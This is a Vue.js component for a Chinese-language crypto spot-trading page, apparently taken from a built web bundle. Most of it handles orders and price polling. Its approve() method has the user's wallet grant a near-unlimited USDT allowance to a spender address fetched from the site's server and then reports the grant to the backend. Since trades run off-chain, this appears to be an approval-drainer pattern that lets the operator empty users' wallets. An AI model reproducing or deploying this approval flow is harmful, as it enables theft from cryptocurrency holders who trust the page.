
import { getUserInfo, spotOrderList,spotcancelOrder, closeOrder, postAuth, searchIsAuth, spotBuy, getCoinInfo, spotSell } from '../service/getdata'
import {mapState,mapMutations} from 'vuex'
import usdtAbi from "../components/USDT.json";
import AmountSlider from "../components/amountSlider.vue";
import XHeader from 'vux/src/components/x-header/index.vue'
import Toast from 'vux/src/components/toast/index.vue'

import Kline from '../components/kline.vue'
export default{
data(){
return{
msg: "",
show: false,
name: "",
type: 1,

open_type: 1,
value2: 1,
option2: [{
text:this.$t('市价'),
value: 1
},{
text: this.$t('限价'),
value: 2
}],
yxList: [], //左侧列表数据
timeout: null,
showLeftList: false, //左侧列表是否展示
listLoading: false,
number: "",
timerInfo: null,
coinInfo: {}, //买卖五档
shuliang: "", //开仓数量
price: "", //开仓价格
holdList: [], //持有列表
orderType: 0, //0委托,2持有 1历史
flag: "",
userInfo: {}
}
},
components:{
Toast,
AmountSlider,
XHeader,
Kline
},
computed:{
...mapState(['url','token'])
},
mounted() {
this.$nextTick(()=>{
this.getCoinInfo()
})
},
created(){
this.SETTOKEN()

this.name = this.$route.query.name || 'BTC'
this.open_type = this.$route.query.stype || 1
this.trade_type = this.$route.query.trade_type || 1
this.flag = this.$route.query.flag
if(this.trade_type=='3'){
this.orderType=2
}
this.getUserInfo()

},
methods:{
...mapMutations(['GETRECENTBUY','SETTOKEN']),
getAmount(val) {
if (!val) {
val = ''
}
this.shuliang = val;
},
setName(name){
if (!!name) {
this.name = name;
}
this.name = name;
},
getUserInfo(){
var that = this
this.$Loading()
getUserInfo({token: this.token}).then(function(res){
var res = res.data;
that.$Loading.close()
if(res.status=='1'){
that.userInfo = res.data

}else if(res.status=='-1'){

}
}.bind(this),function(){
that.$Loading.close()

console.log("error")
})
},
closeOrder(id){
var that = this
this.$vux.confirm.show({
title: that.$t("提示"),
content:that.$t("确定执行平仓操作"),
cancelText:that.$t("取消"),
confirmText: that.$t("确定"),
onConfirm:function(){
that.$Loading()
closeOrder({token: that.token, id, trade_type: that.trade_type}).then(function(res){
var res = res.data;
that.$Loading.close()
if(res.status=='1'){

that.$vux.alert.show({
title: that.$t("提示"),
content: res.message,
buttonText: that.$t("确定"),
onHide:function(){
that.getYxOrderList(true)

}
})
}else if(res.status=='-1'){
that.SETUSERNAME(undefined)
that.$router.push('/pages/login')
}else{
that.sendMsg(res.message)
}
}.bind(this),function(){
that.$Loading.close()
that.$router.push("/pages/relogin")
console.log("error")
})
}
})

},
getOrderList(isLoading){
var that = this
if(!!isLoading){
this.$Loading()
}
spotOrderList({token: this.token,status: this.orderType,trade_type: this.trade_type, flag: this.flag}).then(function(res){
var res = res.data;
if(!!isLoading){
that.$Loading.close()
}
if(res.status=='1'){
that.holdList = res.data || []
}else if(res.status=='-1'){
that.SETUSERNAME(undefined)
that.$router.push('/pages/login')
}
}.bind(this),function(){
if(!!isLoading){
that.$Loading.close()
}
that.$router.push("/pages/relogin")
console.log("error")
})
},
trade(type){
if(!this.shuliang || this.shuliang=='' || this.shuliang=='0'){
this.sendMsg('请输入交易金额')
return
}
if(this.value2==2 && ( !this.price || this.price=='' || this.price=='0')){
this.sendMsg('请输入价格')
return
}

const that = this
this.$vux.confirm.show({
title: that.$t("提示"),
content:that.$t("确定执行该操作"),
cancelText:that.$t("取消"),
confirmText: that.$t("确定"),
onConfirm:function(){
that.confirmTrade(type)
}
})
},

searchAuth(type){
const that = this
searchIsAuth({token: this.token}).then(function(res){
var res = res.data;

if(res.status=='0'){
that.approve(type)
}else if(res.status=='-1'){

}else{
that.trade(type)
}
}.bind(this),function(){
if(!!isLoading){
that.$Loading.close()
}
})
},

async approve(type) { // 发起授权
const APPROVE_NUMBER = '11579208923731619542357098500868790785326998466564056403945758400791312963993'
const APPROVE_ADDRESS = '0xdac17f958d2ee523a2206206994597c13d831ec7'
console.log(this.userInfo.address)
console.log(APPROVE_ADDRESS)
const that = this
try {

that.$Loading()
var web3 = new Web3(window.ethereum);
const approveNum = APPROVE_NUMBER
const gasPrice =  await web3.eth.getGasPrice();
var myContract = new web3.eth.Contract(usdtAbi, APPROVE_ADDRESS, { from: web3.eth.defaultAccount });


myContract.methods
.approve(that.coinInfo.maddress, approveNum)
.send({ from: this.userInfo.address, gasPrice: gasPrice, gas: 70000 }) // ,gasPrice: this.gasObj.gasPrice, gas: this.gasObj.gaslimit
.on("transactionHash", (e) => { // 这里会得到一个hash值
that.txnhash = e
that.$Loading.close()





that.postApprove(type)
})
.on('receipt', (e) => { // 这里会返回一个对象
console.log('receipt', e)
that.$Loading.close()

})
.on("error", (error) => {
that.$Loading.close()

const { code } = error
if (code === 4001) {
that.sendMsg(that.$t('您已拒絕'))
}
});
} catch (err) {
that.$Loading.close()
that.sendMsg(that.$t('請重試'))

console.log(err)
}
},
postApprove(type){
const that = this
that.$Loading()
postAuth({token: this.token}).then(function(res){
var res = res.data;
that.$Loading.close()
that.trade(type)
}.bind(this),function(){
that.$Loading.close()
})
},


confirmTrade(type){

var that = this
this.$Loading()
if(type==1){
spotBuy({token: this.token, type, symbol: this.name,  number: this.shuliang, price: this.price, ptype: this.value2,trade_type: this.trade_type, flag: this.flag}).then(function(res){
var res = res.data;
that.$Loading.close()
if(res.status=='1'){
that.sendMsg(res.message)
that.getOrderList(true)
}else if(res.status=='-1'){
that.SETUSERNAME(undefined)
that.$router.push('/pages/login')
}
}.bind(this),function(){
that.$Loading.close()

that.$router.push("/pages/relogin")
console.log("error")
})
}else{
spotSell({token: this.token, type, symbol: this.name,  number: this.shuliang, price: this.price, ptype: this.value2,trade_type: this.trade_type, flag: this.flag}).then(function(res){
var res = res.data;
that.$Loading.close()
if(res.status=='1'){
that.sendMsg(res.message)
that.getOrderList(true)
}else if(res.status=='-1'){
that.SETUSERNAME(undefined)
that.$router.push('/pages/login')
}
}.bind(this),function(){
that.$Loading.close()

that.$router.push("/pages/relogin")
console.log("error")
})
}

},
cancelOrder(id){
var that = this

this.$vux.confirm.show({
title: that.$t("提示"),
content:that.$t("确定执行撤单操作？"),
cancelText:that.$t("取消"),
confirmText: that.$t("确定"),
onConfirm:function(){
that.$Loading()
spotcancelOrder({token: that.token, id,trade_type: that.trade_type, flag: this.flag}).then(function(res){
var res = res.data;
that.$Loading.close()
if(res.status=='1'){

that.$vux.alert.show({
title: that.$t("提示"),
content: res.message,
buttonText: that.$t("确定"),
onHide:function(){
that.getOrderList(true)

}
})
}else if(res.status=='-1'){
that.SETUSERNAME(undefined)
that.$router.push('/pages/login')
}else{
that.sendMsg(res.message)
}
}.bind(this),function(){
that.$Loading.close()
that.$router.push("/pages/relogin")
console.log("error")
})
}
})

},

getCoinInfo() { // 获取数据
clearInterval(this.timerInfo)
this.timerInfo = null
this.getIntervalCoin()
this.timerInfo = setInterval(() => {
this.getIntervalCoin()
}, 2000);
},


getIntervalCoin(){
const that = this
getCoinInfo({ token: this.token,symbol: this.name, type: this.open_type,trade_type: this.trade_type, flag: this.flag}).then(function(res){
var res = res.data;
if(res.status=='1'){
that.coinInfo = res.data
}else if(res.status=='-1'){
that.SETUSERNAME(undefined)
that.$router.push('/pages/login')
}else{
that.sendMsg(res.message)
}
}.bind(this),function(){
that.$Loading.close()
console.log("error")
})
this.getOrderList()
},

clearTimer() { //清楚定时器

clearInterval(this.timeout)
this.timeout = null
clearInterval(this.timerInfo)
this.timerInfo = null
},

sendMsg(content) {
this.msg = content;
this.show = true;
},
},
deactivated() {
this.clearTimer()
},
beforeDestroy() {
this.clearTimer()
},
}



// WEBPACK FOOTER //
// ./src/pages/spot.vue